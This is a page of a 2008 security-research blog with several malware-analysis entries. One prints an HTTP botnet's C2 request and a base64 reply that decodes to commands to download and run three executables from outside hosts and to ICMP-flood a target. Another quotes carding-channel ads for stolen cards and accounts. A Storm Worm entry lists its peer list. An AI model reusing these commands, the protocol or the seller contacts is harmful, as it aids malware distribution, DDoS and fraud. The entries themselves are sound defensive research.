HTTP-based Botnets

Saturday, June 7. 2008
We observe more and more botnets using HTTP-based communication channels. Quite often, these bots are used for DDoS attacks as the following example explains. We recently analyzed a bot with CWSandbox (MD5: 112ccb580b0013f967b6ba991802850d) that first performs the usual steps during a bot infection, e.g., copying itself to the Windows system folder and adding registry keys such that the bot is started as a service after a reboot. The bot then issues the following (obfuscated) HTTP request:
POST /ddd/stat.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: life-tablets.xxx
Content-Length: 27
Cache-Control: no-cache

id=xMACHINENAME_0&build_id=1362B8E


The answer from the server is:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Jun 2008 19:59:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close

fc
MTA7MjAwMDsxMDsxOzA7MzA7MTAwOzM7MjA7MTAwMDsy
MDAwI2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lL2kuZXhl
O2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lLzEwMDAuZXh
lO2dldCBodHRwOi8vbGlmZS10YWJsZXRzLmNuL2xmL2xvY
WQuZXhlO2Zsb29kIGljbXAgbGliZXJ0eXJlc2VydmVkaXJlY3R
vcnkuY29tIzEwIw==
0

The response is base64-encoded and decoding leads to the following (obfuscated) commands:
10;2000;10;1;0;30;100;3;20;1000;2000#
get hxxp://dftreo.xxx/lf/e/i.exe;
get hxxp://dftreo.xxx/lf/e/1000.exe;
get hxxp://life-tablets.xxx/lf/load.exe;
flood icmp TARGET.COM&10;

Thus three additional malware binaries are installed on the compromised machine and the bot also starts an ICMP-based DDoS attack against the specified target.
Posted by Thorsten Holz in malware at 15:30 | Comments (3) | Trackbacks (0)

Good ol' #CCpower

Friday, June 6. 2008
A few weeks ago, one of our honeypots was hacked and the attacker installed an IRC bouncer on the machine. Nothing too spectacular, but nevertheless interesting since we can then observe how the attackers communicate with each other and what channels they use. The interesting part is that the attackers joined one of the well-known carding channels, in which credit card infos, Paypal accounts, PINs, and other stolen information is traded. Here a small excerpt, the full dump is many megabytes in size:

- DonDax SELLING Selling USA/Europe VISA/MC DUMPS ,BANKS(halifax,HSBC etc ),Fulls(PIN,DOB,SSN),Paypals(email),EGOLD, and Cvv2's(worldwide). No ripping and NO TESTS.

- Hicks Cashout WESTERN UNION on UK LONDON / GREECE- ATHEENS !!!

- Hicks Selling dumps+pin new ones every week and FULLS ALSO !!!

- JuanesXloT Scot Epic partea ta 50% !! DE asemenea scot conturi caja madrid partea ta 50% ! Caut spammer bun sa fim parteneri am eu scamuri partea ta 50% ! Sau daca ai tu carduri care merg facute cu 1010000... si merg scoase

- M3ster Daca doresti sa-ti achizitionezi un RooT de :scan / flood / pagina / emech / psybnc sau poate un remote desktop, Shell , sau poate vrei un site, Ofer Hosting, cc / paypal / spam /drone /boti , Tot ce trebuie sa

- Maka` I need email list all country big file on email list like 500 mb 1-2 gb if you have prv me

- d3x SELLING EU DUMPS WITH PIN [TRACK1/TRACK2+PIN] || PAYPAL ACCOUNTS WITH GOOD BALANCE [VERIFIED/UNVERIFIED] || FULLZ AND CVV2 [US/EU] || DONT WASTE MY TIME OR I WILL IGNORE YOU || FOR DEAL ICQ : 436306694

- traxpro Selling USA/Worldwide VISA/MC dumps from hotels. Natural track. Various bins are available. Offering tutorials, software and other additional info for all my clients.

- traxpro Spamming for HSBC, Halifax, CIBC. e-trade bank logins. Selling UK, USA, Swedish, Australian cvvs.

- Selling CVV, Checked and Verified 5$ each, E-gold and WU(for bigger orders) Accepted

- Charleskj Am Nevoie De Un Php Mailer Uplodat Care Trimite Inbox , Cine Are Prv Me , Pot Oferi Multe / Need A Php Mailer Uploated That Sends Inbox , Who Have Please Prv Me , Can Offer Many Things !!!

Different people offer a diverse set of stolen credentials, which can then be abused - quite interesting to observe all the trading activity (although we can only see the advertisements and not the actual trades). Last year, Franklin et al. published a study entitled "An Inquiry into the Nature and Causes of the Wealth of Internet Miscreants". In this paper, the authors present an analysis of 13 million public IRC messages obtained from several networks and channels, collected over a 7 month period. The particular channel we observed is one of them - time for some analysis to validate their measurements...
Posted by Thorsten Holz in honeynets, malware at 00:06 | Comments (5) | Trackback (1)

Mail Problems

Thursday, June 5. 2008
The mail server of our university is down since more than two days (sic!). I'm wondering how many mails I have lost up to now and what kind of interesting information did not reach me... If you want to reach me, please use the Gmail account. On the other hand: no distracting e-mails and lots of time to write papers. The ACSAC deadline is next Sunday, presumably I have a paper ready until then :)
Posted by Thorsten Holz in general at 20:59 | Comments (0) | Trackbacks (0)

OECD Report on Malware

Wednesday, June 4. 2008
A few days ago, the OECD published a report entitled "Malicious Software (Malware): A Security Threat to the Internet Economy". It provides a high-level overview of current threats in the area of malware and is a nice read.

Excerpt: "This report, developed in collaboration with experts, aims to inform policy makers about malware impacts, growth and evolution, and countermeasures to combat malware. It seeks to analyse some of the main issues associated with malware and to explore how the international community can better work together to address the problem. Highlights include the following:
  • Spam has evolved from a nuisance to a vehicle for fraud to a vector for distributing malware. Malware, in the form of botnets, has become a critical part of a self sustaining cyber attack system. The use of malware has become more sophisticated and targeted. Many attacks are smaller and attempt to stay "below the radar" of the security and law enforcement communities.

  • The effectiveness of current security technologies and other protections in detecting and containing malware is challenged by the shrinking of the time between the discovery of vulnerabilities in software products and their exploitation.

  • [...]

  • Current response and mitigation are mainly reactive. There is a need for more structured and strategic co-ordination at national and international levels with involvement of all actors to more adequately assess and mitigate the risk of malware.

  • No single entity has a global understanding of the scope, trends, development and consequences of malware and thus the overall malware problem is difficult to quantify. Data on malware are not consistent and terminology for cataloguing and measuring the occurrence of malware is not harmonised.

  • Although its economic and social impacts may be hard to quantify, malware used directly or indirectly can harm critical information infrastructures, result in financial losses, and plays a role in the erosion of trust and confidence in the Internet economy."

A similar report was published a few months ago by ENISA: "Security Economics and The Internal Market" (Authors: R. Anderson, R. Böhme, R. Clayton, and T. Moore) - definitely worth reading!
Posted by Thorsten Holz in paper at 01:17 | Comments (0) | Trackbacks (0)

Storm Worm Dead?

Tuesday, June 3. 2008
The Internet Storm Center had today a story about a "New Stormworm download site". The Storm Worm botnet is thus still live and propagating. However, the size of the botnet is decreasing significantly: Currently, only about 8.2K hosts are online within the network (based on measurement results with the crawler presented in the LEET'08 paper). Compared to the size a few months ago (40K in January, even more a few months earlier), this is a strong decrease. Will the botnet thus become obsolete in the near future?

The CWSandbox analysis of the Storm Worm sample loveyou.exe (MD5: 0679c17b9072d378cb0a39272fed98f5) shows the typical signs of a Storm sample: It first drops a file called C:\WINDOWS\farkrish.exe and also the typical peer-list:

H:\WINDOWS\farkrish.config [peers] 000011213D362D29747E07640874096F = C933DDCB2E6E00
H:\WINDOWS\farkrish.config [peers] 01006C75C1523825A27A642FD05F6859 = BDA2AF3A4A3600
H:\WINDOWS\farkrish.config [peers] 02003727703C8435FA41B70F977E6055 = 53C8003932CD00
H:\WINDOWS\farkrish.config [peers] 0300B623D3499048CC4BB30B5857C959 = C86E5D666A2C00
H:\WINDOWS\farkrish.config [peers] 04000A4C7B4BBC41AE5B6B486A00F613 = 7B11B24647B600
H:\WINDOWS\farkrish.config [peers] 05002744C35A572A932662411A117715 = 7B150612413A00
H:\WINDOWS\farkrish.config [peers] 06000772D412A4727D1B415B7A73F450 = 183C4148226F00
H:\WINDOWS\farkrish.config [peers] 07000600822E65796C39356C6E3C750E = 7B12A2E745FA00
H:\WINDOWS\farkrish.config [peers] 0800F81A9A4D644D6566FC73591C0B5F = C925ECC4375C00
H:\WINDOWS\farkrish.config [peers] 090007168A1C884C2D60D12FD900D86E = 7D19C551116E00
H:\WINDOWS\farkrish.config [peers] 0A00C95E9909F25F7844635C9D0FAD62 = BDA663FA77E400
H:\WINDOWS\farkrish.config [peers] 0B00364A9F3CC648DC1EE87E0E022E70 = 53CB22366F8D00
H:\WINDOWS\farkrish.config [peers] 0C00C65A0A69484DDF47D724A81F3B52 = A007E95F321F00
H:\WINDOWS\farkrish.config [peers] 0D00DE0895137F5AC2376814D6415F4D = 40FEB3F7645700
H:\WINDOWS\farkrish.config [peers] 0E007A157B4A305BD352D1039829B24C = 43954E9F0F4D00
H:\WINDOWS\farkrish.config [peers] 0F00042A5F72C81BD16DDB4B7A38DD14 = 3EFBBF4273AC00
H:\WINDOWS\farkrish.config [peers] 1000A535661B0414FA6556507D75880A = CBDA9AA318CD00
H:\WINDOWS\farkrish.config [peers] 1100556AD128A56385603C71BF3A3476 = 4421178C717600
H:\WINDOWS\farkrish.config [peers] 12000A1B5609B740B609833F2C11B212 = C93AE62B6AFA00
H:\WINDOWS\farkrish.config [peers] 1300907BD345E730C048E311A3705B21 = 539C8C79473500
H:\WINDOWS\farkrish.config [peers] 1400FA75B31AF97F4564B80F49060C72 = 477196302BC400
H:\WINDOWS\farkrish.config [peers] 1500D1510455D5005746601F4E4A584F = BD9C1C33213F00
[...]

Besides this, farkrish.exe is allowed to access the network and the infected machines syncs the time via NTP. The content of the UDP packets that are sent out have the same structure as always:
0000     10 a6 e6 22 f9 ca cc b0 2d a2 8c c7 de 57 ba 53

0010     5e c5 e5 a6 17 02 48 31 46
Thus it seems that there are no major changes in this new update release.
Posted by Thorsten Holz in malware at 11:59 | Comments (0) | Trackbacks (0)
« previous page   (Page 4 of 39, totaling 193 entries) » next page